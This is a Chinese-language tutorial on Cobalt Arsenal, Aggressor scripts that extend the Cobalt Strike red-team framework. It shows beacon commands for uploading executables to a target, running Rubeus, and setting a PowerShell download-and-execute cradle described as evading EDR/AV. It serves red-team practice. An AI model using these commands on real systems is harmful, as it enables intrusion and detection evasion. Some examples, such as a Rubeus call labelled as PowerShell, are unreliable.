Cobalt Arsenal 项目教程

1. 项目介绍

Cobalt Arsenal 是由 Mariusz Banach 开发的一个开源项目，旨在为 Cobalt Strike 提供一系列经过实战检验的 Aggressor 脚本。这些脚本极大地增强了 Cobalt Strike 的功能，使其在红队操作和对手模拟中更加灵活和高效。项目包含了超过 3300 行代码，涵盖了从 Beacon 管理到 Payload 生成等多个方面的实用工具和增强功能。

2. 项目快速启动

2.1 环境准备

在开始之前，确保你已经安装了 Cobalt Strike 4.0 或更高版本，并且熟悉基本的 Aggressor 脚本语法。

2.2 下载与安装

1. 克隆项目到本地：

   git clone https://github.com/mgeeky/cobalt-arsenal.git
   

2. 将项目中的 .cna 脚本文件复制到 Cobalt Strike 的 scripts 目录下。

2.3 加载脚本

在 Cobalt Strike 中，通过 Script Manager 加载所需的 Aggressor 脚本。例如，加载 better-upload.cna：

script_import "better-upload.cna"

2.4 使用示例

以下是一个简单的使用示例，展示如何使用 better-upload.cna 脚本上传文件到目标主机：

beacon> upload /path/to/local/file.exe \\target\c$\path\to\remote\file.exe

3. 应用案例和最佳实践

3.1 案例一：自动化初始任务

使用 Beacon_Initial_Tasks.cna 脚本，可以在 Beacon 首次签到时自动执行预定义的任务。例如，设置初始任务为执行一个 PowerShell 命令：

beacon> set_initial_tasks "execute-assembly C:\\tools\\Rubeus.exe hash /password:test"

3.2 案例二：自定义 PowerShell 下载执行

使用 custom-powershell-hooks.cna 脚本，可以自定义 PowerShell 下载和执行的命令，避免被常见的 EDR 和 AV 检测：

beacon> set POWERSHELL_DOWNLOAD_CRADLE "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')"

4. 典型生态项目

4.1 Cobalt Strike 官方社区工具包

Cobalt Strike 官方提供了一个社区工具包（Community Kit），其中包含了大量由社区贡献的 Aggressor 脚本和工具，可以与 Cobalt Arsenal 结合使用，进一步提升红队操作的效率。

4.2 Outflank Security Tooling

Outflank Security Tooling 是一个精选的进攻性安全工具集，设计用于增强 Cobalt Strike 的规避能力。通过与 Cobalt Strike 结合使用，可以扩展红队操作的范围和深度。

4.3 Core Impact

Core Impact 是 Fortra 提供的一款渗透测试工具，可以与 Cobalt Strike 协同工作，共享资源并部署 Beacon 进行会话传递和隧道功能。结合使用可以提供更全面的渗透测试解决方案。